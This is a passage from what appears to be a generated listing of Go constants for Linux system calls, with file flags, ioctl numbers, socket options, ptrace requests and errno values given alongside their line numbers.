O_DIRECTORY = 0x10000 constant O_DSYNC (line 168) | O_DSYNC = 0x10 constant O_EXCL (line 169) | O_EXCL = 0x400 constant O_FSYNC (line 170) | O_FSYNC = 0x4010 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x2000 constant O_NDELAY (line 172) | O_NDELAY = 0x80 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x80 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x4010 constant O_SYNC (line 179) | O_SYNC = 0x4010 constant O_TMPFILE (line 180) | O_TMPFILE = 0x410000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x40042407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8004240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc004240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x80042406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x4008743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x80087446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x800c744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 220) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x80087447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x2000744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffff constant PTRACE_GETFPREGS (line 230) | PTRACE_GETFPREGS = 0xe constant PTRACE_GET_THREAD_AREA (line 231) | PTRACE_GET_THREAD_AREA = 0x19 constant PTRACE_GET_THREAD_AREA_3264 (line 232) | PTRACE_GET_THREAD_AREA_3264 = 0xc4 constant PTRACE_GET_WATCH_REGS (line 233) | PTRACE_GET_WATCH_REGS = 0xd0 constant PTRACE_OLDSETOPTIONS (line 234) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_PEEKDATA_3264 (line 235) | PTRACE_PEEKDATA_3264 = 0xc1 constant PTRACE_PEEKTEXT_3264 (line 236) | PTRACE_PEEKTEXT_3264 = 0xc0 constant PTRACE_POKEDATA_3264 (line 237) | PTRACE_POKEDATA_3264 = 0xc3 constant PTRACE_POKETEXT_3264 (line 238) | PTRACE_POKETEXT_3264 = 0xc2 constant PTRACE_SETFPREGS (line 239) | PTRACE_SETFPREGS = 0xf constant PTRACE_SET_THREAD_AREA (line 240) | PTRACE_SET_THREAD_AREA = 0x1a constant PTRACE_SET_WATCH_REGS (line 241) | PTRACE_SET_WATCH_REGS = 0xd1 constant RLIMIT_AS (line 242) | RLIMIT_AS = 0x6 constant RLIMIT_MEMLOCK (line 243) | RLIMIT_MEMLOCK = 0x9 constant RLIMIT_NOFILE (line 244) | RLIMIT_NOFILE = 0x5 constant RLIMIT_NPROC (line 245) | RLIMIT_NPROC = 0x8 constant RLIMIT_RSS (line 246) | RLIMIT_RSS = 0x7 constant RNDADDENTROPY (line 247) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 248) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 249) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 250) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 251) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 252) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 253) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 254) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 255) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 256) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 257) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 258) | RTC_EPOCH_READ = 0x4004700d constant RTC_EPOCH_SET (line 259) | RTC_EPOCH_SET = 0x8004700e constant RTC_IRQP_READ (line 260) | RTC_IRQP_READ = 0x4004700b constant RTC_IRQP_SET (line 261) | RTC_IRQP_SET = 0x8004700c constant RTC_PARAM_GET (line 262) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 263) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 264) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 265) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 266) | RTC_PLL_GET = 0x401c7011 constant RTC_PLL_SET (line 267) | RTC_PLL_SET = 0x801c7012 constant RTC_RD_TIME (line 268) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 269) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 270) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 271) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 272) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 273) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 274) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 275) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 276) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 277) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 278) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 279) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 280) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 281) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 282) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 283) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 284) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 285) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 286) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 287) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 288) | SFD_NONBLOCK = 0x80 constant SIOCATMARK (line 289) | SIOCATMARK = 0x40047307 constant SIOCGPGRP (line 290) | SIOCGPGRP = 0x40047309 constant SIOCGSTAMPNS_NEW (line 291) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 292) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 293) | SIOCINQ = 0x467f constant SIOCOUTQ (line 294) | SIOCOUTQ = 0x7472 constant SIOCSPGRP (line 295) | SIOCSPGRP = 0x80047308 constant SOCK_CLOEXEC (line 296) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 297) | SOCK_DGRAM = 0x1 constant SOCK_NONBLOCK (line 298) | SOCK_NONBLOCK = 0x80 constant SOCK_STREAM (line 299) | SOCK_STREAM = 0x2 constant SOL_SOCKET (line 300) | SOL_SOCKET = 0xffff constant SO_ACCEPTCONN (line 301) | SO_ACCEPTCONN = 0x1009 constant SO_ATTACH_BPF (line 302) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 303) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 304) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 305) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 306) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 307) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 308) | SO_BROADCAST = 0x20 constant SO_BSDCOMPAT (line 309) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 310) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 311) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 312) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 313) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 314) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 315) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 316) | SO_DOMAIN = 0x1029 constant SO_DONTROUTE (line 317) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 318) | SO_ERROR = 0x1007 constant SO_INCOMING_CPU (line 319) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 320) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 321) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 322) | SO_LINGER = 0x80 constant SO_LOCK_FILTER (line 323) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 324) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 325) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 326) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 327) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 328) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 329) | SO_OOBINLINE = 0x100 constant SO_PASSCRED (line 330) | SO_PASSCRED = 0x11 constant SO_PASSPIDFD (line 331) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 332) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 333) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 334) | SO_PEERCRED = 0x12 constant SO_PEERGROUPS (line 335) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 336) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 337) | SO_PEERSEC = 0x1e constant SO_PREFER_BUSY_POLL (line 338) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 339) | SO_PROTOCOL = 0x1028 constant SO_RCVBUF (line 340) | SO_RCVBUF = 0x1002 constant SO_RCVBUFFORCE (line 341) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 342) | SO_RCVLOWAT = 0x1004 constant SO_RCVMARK (line 343) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 344) | SO_RCVTIMEO = 0x1006 constant SO_RCVTIMEO_NEW (line 345) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 346) | SO_RCVTIMEO_OLD = 0x1006 constant SO_RESERVE_MEM (line 347) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 348) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 349) | SO_REUSEPORT = 0x200 constant SO_RXQ_OVFL (line 350) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 351) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 352) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 353) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 354) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 355) | SO_SNDBUF = 0x1001 constant SO_SNDBUFFORCE (line 356) | SO_SNDBUFFORCE = 0x1f constant SO_SNDLOWAT (line 357) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 358) | SO_SNDTIMEO = 0x1005 constant SO_SNDTIMEO_NEW (line 359) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 360) | SO_SNDTIMEO_OLD = 0x1005 constant SO_STYLE (line 361) | SO_STYLE = 0x1008 constant SO_TIMESTAMPING (line 362) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 363) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 364) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 365) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 366) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 367) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 368) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 369) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 370) | SO_TXTIME = 0x3d constant SO_TYPE (line 371) | SO_TYPE = 0x1008 constant SO_WIFI_STATUS (line 372) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 373) | SO_ZEROCOPY = 0x3c constant TAB1 (line 374) | TAB1 = 0x800 constant TAB2 (line 375) | TAB2 = 0x1000 constant TAB3 (line 376) | TAB3 = 0x1800 constant TABDLY (line 377) | TABDLY = 0x1800 constant TCFLSH (line 378) | TCFLSH = 0x5407 constant TCGETA (line 379) | TCGETA = 0x5401 constant TCGETS (line 380) | TCGETS = 0x540d constant TCGETS2 (line 381) | TCGETS2 = 0x4030542a constant TCSAFLUSH (line 382) | TCSAFLUSH = 0x5410 constant TCSBRK (line 383) | TCSBRK = 0x5405 constant TCSBRKP (line 384) | TCSBRKP = 0x5486 constant TCSETA (line 385) | TCSETA = 0x5402 constant TCSETAF (line 386) | TCSETAF = 0x5404 constant TCSETAW (line 387) | TCSETAW = 0x5403 constant TCSETS (line 388) | TCSETS = 0x540e constant TCSETS2 (line 389) | TCSETS2 = 0x8030542b constant TCSETSF (line 390) | TCSETSF = 0x5410 constant TCSETSF2 (line 391) | TCSETSF2 = 0x8030542d constant TCSETSW (line 392) | TCSETSW = 0x540f constant TCSETSW2 (line 393) | TCSETSW2 = 0x8030542c constant TCXONC (line 394) | TCXONC = 0x5406 constant TFD_CLOEXEC (line 395) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 396) | TFD_NONBLOCK = 0x80 constant TIOCCBRK (line 397) | TIOCCBRK = 0x5428 constant TIOCCONS (line 398) | TIOCCONS = 0x80047478 constant TIOCEXCL (line 399) | TIOCEXCL = 0x740d constant TIOCGDEV (line 400) | TIOCGDEV = 0x40045432 constant TIOCGETD (line 401) | TIOCGETD = 0x7400 constant TIOCGETP (line 402) | TIOCGETP = 0x7408 constant TIOCGEXCL (line 403) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 404) | TIOCGICOUNT = 0x5492 constant TIOCGISO7816 (line 405) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 406) | TIOCGLCKTRMIOS = 0x548b constant TIOCGLTC (line 407) | TIOCGLTC = 0x7474 constant TIOCGPGRP (line 408) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 409) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 410) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 411) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 412) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 413) | TIOCGRS485 = 0x4020542e constant TIOCGSERIAL (line 414) | TIOCGSERIAL = 0x5484 constant TIOCGSID (line 415) | TIOCGSID = 0x7416 constant TIOCGSOFTCAR (line 416) | TIOCGSOFTCAR = 0x5481 constant TIOCGWINSZ (line 417) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 418) | TIOCINQ = 0x467f constant TIOCLINUX (line 419) | TIOCLINUX = 0x5483 constant TIOCMBIC (line 420) | TIOCMBIC = 0x741c constant TIOCMBIS (line 421) | TIOCMBIS = 0x741b constant TIOCMGET (line 422) | TIOCMGET = 0x741d constant TIOCMIWAIT (line 423) | TIOCMIWAIT = 0x5491 constant TIOCMSET (line 424) | TIOCMSET = 0x741a constant TIOCM_CAR (line 425) | TIOCM_CAR = 0x100 constant TIOCM_CD (line 426) | TIOCM_CD = 0x100 constant TIOCM_CTS (line 427) | TIOCM_CTS = 0x40 constant TIOCM_DSR (line 428) | TIOCM_DSR = 0x400 constant TIOCM_RI (line 429) | TIOCM_RI = 0x200 constant TIOCM_RNG (line 430) | TIOCM_RNG = 0x200 constant TIOCM_SR (line 431) | TIOCM_SR = 0x20 constant TIOCM_ST (line 432) | TIOCM_ST = 0x10 constant TIOCNOTTY (line 433) | TIOCNOTTY = 0x5471 constant TIOCNXCL (line 434) | TIOCNXCL = 0x740e constant TIOCOUTQ (line 435) | TIOCOUTQ = 0x7472 constant TIOCPKT (line 436) | TIOCPKT = 0x5470 constant TIOCSBRK (line 437) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 438) | TIOCSCTTY = 0x5480 constant TIOCSERCONFIG (line 439) | TIOCSERCONFIG = 0x5488 constant TIOCSERGETLSR (line 440) | TIOCSERGETLSR = 0x548e constant TIOCSERGETMULTI (line 441) | TIOCSERGETMULTI = 0x548f constant TIOCSERGSTRUCT (line 442) | TIOCSERGSTRUCT = 0x548d constant TIOCSERGWILD (line 443) | TIOCSERGWILD = 0x5489 constant TIOCSERSETMULTI (line 444) | TIOCSERSETMULTI = 0x5490 constant TIOCSERSWILD (line 445) | TIOCSERSWILD = 0x548a constant TIOCSER_TEMT (line 446) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 447) | TIOCSETD = 0x7401 constant TIOCSETN (line 448) | TIOCSETN = 0x740a constant TIOCSETP (line 449) | TIOCSETP = 0x7409 constant TIOCSIG (line 450) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 451) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 452) | TIOCSLCKTRMIOS = 0x548c constant TIOCSLTC (line 453) | TIOCSLTC = 0x7475 constant TIOCSPGRP (line 454) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 455) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 456) | TIOCSRS485 = 0xc020542f constant TIOCSSERIAL (line 457) | TIOCSSERIAL = 0x5485 constant TIOCSSOFTCAR (line 458) | TIOCSSOFTCAR = 0x5482 constant TIOCSTI (line 459) | TIOCSTI = 0x5472 constant TIOCSWINSZ (line 460) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 461) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 462) | TOSTOP = 0x8000 constant TUNATTACHFILTER (line 463) | TUNATTACHFILTER = 0x800854d5 constant TUNDETACHFILTER (line 464) | TUNDETACHFILTER = 0x800854d6 constant TUNGETDEVNETNS (line 465) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 466) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 467) | TUNGETFILTER = 0x400854db constant TUNGETIFF (line 468) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 469) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 470) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 471) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 472) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 473) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 474) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 475) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 476) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 477) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 478) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 479) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 480) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 481) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 482) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 483) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 484) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 485) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 486) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 487) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 488) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 489) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 490) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 491) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 492) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 493) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 494) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 495) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 496) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 497) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 498) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 499) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 500) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 501) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 502) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 503) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 504) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 505) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 506) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 507) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 508) | VDISCARD = 0xd constant VEOF (line 509) | VEOF = 0x10 constant VEOL (line 510) | VEOL = 0x11 constant VEOL2 (line 511) | VEOL2 = 0x6 constant VMIN (line 512) | VMIN = 0x4 constant VREPRINT (line 513) | VREPRINT = 0xc constant VSTART (line 514) | VSTART = 0x8 constant VSTOP (line 515) | VSTOP = 0x9 constant VSUSP (line 516) | VSUSP = 0xa constant VSWTC (line 517) | VSWTC = 0x7 constant VSWTCH (line 518) | VSWTCH = 0x7 constant VT1 (line 519) | VT1 = 0x4000 constant VTDLY (line 520) | VTDLY = 0x4000 constant VTIME (line 521) | VTIME = 0x5 constant VWERASE (line 522) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 523) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 524) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 525) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 526) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 527) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 528) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 529) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 530) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 531) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 532) | WORDSIZE = 0x20 constant XCASE (line 533) | XCASE = 0x4 constant XTABS (line 534) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 535) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 536) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 537) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 542) | EADDRINUSE = syscall.Errno(0x7d) constant EADDRNOTAVAIL (line 543) | EADDRNOTAVAIL = syscall.Errno(0x7e) constant EADV (line 544) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 545) | EAFNOSUPPORT = syscall.Errno(0x7c) constant EALREADY (line 546) | EALREADY = syscall.Errno(0x95) constant EBADE (line 547) | EBADE = syscall.Errno(0x32) constant EBADFD (line 548) | EBADFD = syscall.Errno(0x51) constant EBADMSG (line 549) | EBADMSG = syscall.Errno(0x4d) constant EBADR (line 550) | EBADR = syscall.Errno(0x33) constant EBADRQC (line 551) | EBADRQC = syscall.Errno(0x36) constant EBADSLT (line 552) | EBADSLT = syscall.Errno(0x37) constant EBFONT (line 553) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 554) | ECANCELED = syscall.Errno(0x9e) constant ECHRNG (line 555) | ECHRNG = syscall.Errno(0x25) constant ECOMM (line 556) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 557) | ECONNABORTED = syscall.Errno(0x82) constant ECONNREFUSED (line 558) | ECONNREFUSED = syscall.Errno(0x92) constant ECONNRESET (line 559) | ECONNRESET = syscall.Errno(0x83) constant EDEADLK (line 560) | EDEADLK = syscall.Errno(0x2d) constant EDEADLOCK (line 561) | EDEADLOCK = syscall.Errno(0x38) constant EDESTADDRREQ (line 562) | EDESTADDRREQ = syscall.Errno(0x60) constant EDOTDOT (line 563) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 564) | EDQUOT = syscall.Errno(0x46d) constant EHOSTDOWN (line 565) | EHOSTDOWN = syscall.Errno(0x93) constant EHOSTUNREACH (line 566) | EHOSTUNREACH = syscall.Errno(0x94) constant EHWPOISON (line 567) | EHWPOISON = syscall.Errno(0xa8) constant EIDRM (line 568) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 569) | EILSEQ = syscall.Errno(0x58) constant EINIT (line 570) | EINIT = syscall.Errno(0x8d) constant EINPROGRESS (line 571) | EINPROGRESS = syscall.Errno(0x96) constant EISCONN (line 572) | EISCONN = syscall.Errno(0x85) constant EISNAM (line 573) | EISNAM = syscall.Errno(0x8b) constant EKEYEXPIRED (line 574) | EKEYEXPIRED = syscall.Errno(0xa2) constant EKEYREJECTED (line 575) | EKEYREJECTED = syscall.Errno(0xa4) constant EKEYREVOKED (line 576) | EKEYREVOKED = 